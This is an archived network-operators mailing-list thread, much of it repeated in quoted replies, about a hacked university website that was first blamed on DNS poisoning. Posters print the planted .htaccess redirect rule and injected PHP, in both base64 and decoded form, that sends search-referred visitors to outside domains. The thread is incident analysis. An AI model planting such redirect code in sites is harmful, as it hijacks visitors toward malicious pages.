Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net http://www.robtex.com/dns/whois.arin.net.html /rest/nets;q=208.88.11.111 http://www.robtex.com/ip/208.88.11.111.html ?showDetails=trueshowARIN=falseext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0http://www.robtex.com/ip/208.88.11.0.html - 208.88.11.255 http://www.robtex.com/ip/208.88.11.255.html Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0http://www.robtex.com/ip/208.88.8.0.html - 208.88.11.255 http://www.robtex.com/ip/208.88.11.255.html # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.nethttp://www.robtex.com/dns/www.arin.net.html /whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black matthew.bl...@csulb.eduwrote: By the way, FTP access originated from: 208.88.11.111 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 NetRange: 208.88.8.0 - 208.88.11.255 CIDR: 208.88.8.0/22 OriginAS: AS40603 NetName:SKYWIRE-SG NetHandle: NET-208-88-8-0-1 Parent: NET-208-0-0-0-0 NetType:Direct Allocation Comment:http://www.skywireusa.com RegDate:2008-03-04 Updated:2012-03-02 Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1 OrgName:Sky Wire Communications OrgId: DGSU Address:946 W Sunset Blvd Ste L City: St George StateProv: UT PostalCode: 84770 Country:US RegDate:2007-12-04 Updated:2009-11-04 Ref:http://whois.arin.net/rest/org/DGSU Who We Are Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah. matthew black information technology services california state university, long beach -Original Message- From: Matthew Black [mailto:matthew.bl...@csulb.edu] Sent: Wednesday, June 27, 2012 9:52 AM To: 'Jason Hellenthal'; Arturo Servin Cc: nanog@nanog.org Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# IfModule mod_rewrite.c RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] /IfModule #/c3284d# # # # matthew black information technology services california state university, long beach -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
and upon further investigation, it seems like there might be an actual organization using a host with that IP... http://www.robtex.com/dns/chatwithus.net.html#shared On Tue, Jul 3, 2012 at 2:27 PM, Kyle Creyts kyle.cre...@gmail.com wrote: it actually appears that skywire has a suballocation for that block, http://www.robtex.com/ip/208.88.11.111.html#whois # # The following results may also be obtained via: # http://whois.arin.net http://www.robtex.com/dns/whois.arin.net.html /rest/nets;q=208.88.11.111 http://www.robtex.com/ip/208.88.11.111.html ?showDetails=trueshowARIN=falseext=netref2 # American West Internet SKYWIRE-SG (NET-208-88-11-0-1) 208.88.11.0http://www.robtex.com/ip/208.88.11.0.html - 208.88.11.255 http://www.robtex.com/ip/208.88.11.255.html Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0http://www.robtex.com/ip/208.88.8.0.html - 208.88.11.255 http://www.robtex.com/ip/208.88.11.255.html # # ARIN WHOIS data and services are subject to the Terms of Use # available at: https://www.arin.nethttp://www.robtex.com/dns/www.arin.net.html /whois_tou.html # On Wed, Jun 27, 2012 at 12:56 PM, Matthew Black matthew.bl...@csulb.eduwrote: By the way, FTP access originated from: 208.88.11.111 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 NetRange: 208.88.8.0 - 208.88.11.255 CIDR: 208.88.8.0/22 OriginAS: AS40603 NetName:SKYWIRE-SG NetHandle: NET-208-88-8-0-1 Parent: NET-208-0-0-0-0 NetType:Direct Allocation Comment:http://www.skywireusa.com RegDate:2008-03-04 Updated:2012-03-02 Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1 OrgName:Sky Wire Communications OrgId: DGSU Address:946 W Sunset Blvd Ste L City: St George StateProv: UT PostalCode: 84770 Country:US RegDate:2007-12-04 Updated:2009-11-04 Ref:http://whois.arin.net/rest/org/DGSU Who We Are Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah. matthew black information technology services california state university, long beach -Original Message- From: Matthew Black [mailto:matthew.bl...@csulb.edu] Sent: Wednesday, June 27, 2012 9:52 AM To: 'Jason Hellenthal'; Arturo Servin Cc: nanog@nanog.org Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# IfModule mod_rewrite.c RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] /IfModule #/c3284d# # # # matthew black information technology services california state university, long beach -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On 27 June 2012 09:50, Stephane Bortzmeyer bortzme...@nic.fr wrote: (trollspecially for a Web site written in PHP/troll)? We software makers have a problem, when a customer ask for a application, often theres a wen project that already do it ( for the most part is a round peg on a round hole). So a natural solution is to install this project and customize it to his needs (theme, perhaps some programming). The other option is to create a code from scratch (perhaps using a framework). If you create the code from scratch, it will be safe. A tree cant get a human virus, and a human can't get a tree virus. You are not unhackable, bad practices will byte you on the long term, but you don't see exploits made specifically for this custom made code daily. Too bad, the features the code allow will be few, limited to the budget to the project. Programming sucks, and generate code and bugs, and everybody suffer for it. This option suck. If you use these project that already do 99% of what the customer need, plus a 120% the customer not need (and perhaps don't want). The code quality will be normally be good, with **horrible** exceptions. But sooner or later, (weeks) there will be exploits for this codebase, to hack the site in horrible ways. If the customer don't pay maintenance and dont do the maintenance himself the code will turn comically outdated. Hacking the site will be easy for childrens age 5 and high. Maintenance suck. This option suck. All options suck. Your browser will call you a idiot if you try to browse with a outdated version. But web projects are not this rude on owners. So you have people browsing forums in Chrome 18, where the forums software is a version of 2004 (heavily customized, but this will not save you). Then a cracker comes, uses a know exploit from 2008, and download 1.2 million unhashed passwords. Where 98% of these passwords are reused on facebook, twitter, linkedin and gmail. -- -- ℱin del ℳensaje.
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On 28 Jun 2012, at 08:05, Tei wrote: On 27 June 2012 09:50, Stephane Bortzmeyer bortzme...@nic.fr wrote: (trollspecially for a Web site written in PHP/troll)? We software makers have a problem, when a customer ask for a application, often theres a wen project that already do it ( for the most part is a round peg on a round hole). So a natural solution is to install this project and customize it to his needs (theme, perhaps some programming). The other option is to create a code from scratch (perhaps using a framework). If you create the code from scratch, it will be safe. I would challenge this. This is not true unless you follow very strict rules to make your code safe, and even then, you are not completely safe. A tree cant get a human virus, and a human can't get a tree virus. You are not unhackable, bad practices will byte you on the long term, but you don't see exploits made specifically for this custom made code daily. Think about sql injection, they are not only to specific platforms but to general bad programming practices. snip the rest, it just … sucks =) Regards, as
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On 28 June 2012 14:48, Arturo Servin arturo.ser...@gmail.com wrote: ... Think about sql injection, they are not only to specific platforms but to general bad programming practices. If you are already a good programmer, writing code that is safe against sql inyections is trivial. So is not a real problem, and thats why I don't mention it. A real problem is one that you can't avoid by just walking one step to the left. But I support that you champion it, and I fully agree bad code is possible and some people do write it. We don't really disagree. -- -- ℱin del ℳensaje.
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On 6/28/2012 6:05 AM, Tei wrote: If you use these project that already do 99% of what the customer need, plus a 120% the customer not need (and perhaps don't want). The code quality will be normally be good, with **horrible** exceptions. But sooner or later, (weeks) there will be exploits for this codebase, to hack the site in horrible ways. If the customer don't pay maintenance and dont do the maintenance himself the code will turn comically outdated. Hacking the site will be easy for childrens age 5 and high. Maintenance suck. This option suck. All options suck. That's why there are things like mod_security and other application level firewalls. After exploits have CVE numbers, so do the fixes to the firewalls. And, due to the cost of custom software, and ease of use of push button install Wordpress, this isn't likely to change soon. It would be nice if WP/Joomla/etc force auto-updated by default, at least for sec fixes.. Ken Pacific.Net
No DNS poisoning at Google (in case of trouble, blame the DNS)
On Wed, Jun 27, 2012 at 03:53:17AM +, Matthew Black matthew.bl...@csulb.edu wrote a message of 18 lines which said: We believe the DNS servers used by Google's crawler have been poisoned. [After reading the whole thread and discovering that Google was indeed right.] What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem?
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan dro...@gmail.com wrote: On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan dro...@gmail.com wrote: On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR -- - (2^(N-1))
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote: What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) I cleaned up compromises similar to this in a customer site fairly recently. In our case it was the same exact behavior but was php injected into their application, instead of .htaccess. I do not recall what the original compromise vector was, it was something in the customer's custom application which they resolved. It looked like the malware did a find and replace for ?php and replaced it with: ?php eval(base64_decode(DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vYnJ1Z2dlLm9zYS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0=)); Which decoded yields: error_reporting(0); $qazplm=headers_sent(); if (!$qazplm){ $referer=$_SERVER['HTTP_REFERER']; $uag=$_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer,yahoo) or stristr($referer,bing) or stristr($referer,rambler) or stristr($referer,gogo) or stristr($referer,live.com)or stristr($referer,aport) or stristr($referer,nigma) or stristr($referer,webalta) or stristr($referer,begun.ru) or stristr($referer,stumbleupon.com) or stristr($referer,bit.ly) or stristr($referer,tinyurl.com) or preg_match(/yandex\.ru\/yandsearch\?(.*?)\lr\=/,$referer) or preg_match (/google\.(.*?)\/url/,$referer) or stristr($referer,myspace.com) or stristr($referer,facebook.com) or stristr($referer,aol.com)) { if (!stristr($referer,cache) or !stristr($referer,inurl)){ header(Location: http://brugge.osa.pl/;); exit(); } } } } (where brugge.osa.pl was the destination for the redirects in the compromise of this customer site) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: snip -- - (2^(N-1))
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On Jun 27, 2012, at 10:10 AM, Ryan Rawdon wrote: On Jun 27, 2012, at 9:26 AM, Jason Hellenthal wrote: What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) I cleaned up compromises similar to this in a customer site fairly recently. In our case it was the same exact behavior but was php injected into their application, instead of .htaccess. I do not recall what the original compromise vector was, it was something in the customer's custom application which they resolved. It looked like the malware did a find and replace for ?php and replaced it with: snipped http://r.u13.net/permatemp/forefront.png My message may have gotten caught as spam/malicious by filters. Not sure if it caught the base64 or plaintext so I snipped both. You can view my original message in the archives at http://mailman.nanog.org/pipermail/nanog/2012-June/049612.html (where brugge.osa.pl was the destination for the redirects in the compromise of this customer site) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: snip -- - (2^(N-1))
RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# IfModule mod_rewrite.c RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] /IfModule #/c3284d# # # # matthew black information technology services california state university, long beach -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan dro...@gmail.com wrote: On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR -- - (2^(N-1))
RE: No DNS poisoning at Google (in case of trouble, blame the DNS)
By the way, FTP access originated from: 208.88.11.111 Sky Wire Communications SKYWIRE-SG (NET-208-88-8-0-1) 208.88.8.0 - 208.88.11.255 NetRange: 208.88.8.0 - 208.88.11.255 CIDR: 208.88.8.0/22 OriginAS: AS40603 NetName:SKYWIRE-SG NetHandle: NET-208-88-8-0-1 Parent: NET-208-0-0-0-0 NetType:Direct Allocation Comment:http://www.skywireusa.com RegDate:2008-03-04 Updated:2012-03-02 Ref:http://whois.arin.net/rest/net/NET-208-88-8-0-1 OrgName:Sky Wire Communications OrgId: DGSU Address:946 W Sunset Blvd Ste L City: St George StateProv: UT PostalCode: 84770 Country:US RegDate:2007-12-04 Updated:2009-11-04 Ref:http://whois.arin.net/rest/org/DGSU Who We Are Skywire Communications is the Leading High Speed Internet Provider in Southern Utah. Offering Service in St George, Washington, Santa Clara, Ivins, Cedar City, and Enoch. It is the goal of SkyWire Communications to provide high speed internet access to 100 Percent of Southern Utah. We are located in St George, Utah. matthew black information technology services california state university, long beach -Original Message- From: Matthew Black [mailto:matthew.bl...@csulb.edu] Sent: Wednesday, June 27, 2012 9:52 AM To: 'Jason Hellenthal'; Arturo Servin Cc: nanog@nanog.org Subject: RE: No DNS poisoning at Google (in case of trouble, blame the DNS) Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# IfModule mod_rewrite.c RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] /IfModule #/c3284d# # # # matthew black information technology services california state university, long beach -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan dro...@gmail.com wrote: On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR -- - (2^(N-1))
Re: No DNS poisoning at Google (in case of trouble, blame the DNS)
On 6/27/12 12:51 PM, Matthew Black wrote: Ask and ye shall receive: # more .htaccess (backup copy) #c3284d# IfModule mod_rewrite.c RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|alt avista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysea rch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|d ogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditirel and|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|gasta|gigablast|gimpsy|globalsea rchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick| jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|l ive|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlse arch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|sea rchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|s uchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-onlin e|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche| westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$ http://www.couchtarts.com/media.php [R=301,L] /IfModule #/c3284d# # # # matthew black information technology services california state university, long beach -Original Message- From: Jason Hellenthal [mailto:jhellent...@dataix.net] Sent: Wednesday, June 27, 2012 6:26 AM To: Arturo Servin Cc: nanog@nanog.org Subject: Re: No DNS poisoning at Google (in case of trouble, blame the DNS) What would be nice is the to see the contents of the htaccess file (obviously with sensitive information excluded) On Wed, Jun 27, 2012 at 10:14:12AM -0300, Arturo Servin wrote: It was not DNS issue, but it was a clear case on how community-support helped. Some of us may even learn some new tricks. :) Regards, as Sent from mobile device. Excuse brevity and typos. On 27 Jun 2012, at 05:07, Daniel Rohan dro...@gmail.com wrote: On Wed, Jun 27, 2012 at 10:50 AM, Stephane Bortzmeyer bortzme...@nic.frwrote: What made you think it can be a DNS cache poisoning (a very rare event, despite what the media say) when there are many much more realistic possibilities (trollspecially for a Web site written in PHP/troll)? What was the evidence pointing to a DNS problem? It seems likely that he made a mistake in his analysis of the evidence. Something that could happen to anyone when operating outside of a comfort zone or having a bad day. Go easy. -DR G' did they miss anyone in that list of referers :-) Thanks for posting! -- Thank you, Robert Miller http://www.armoredpackets.com Twitter: @arch3angel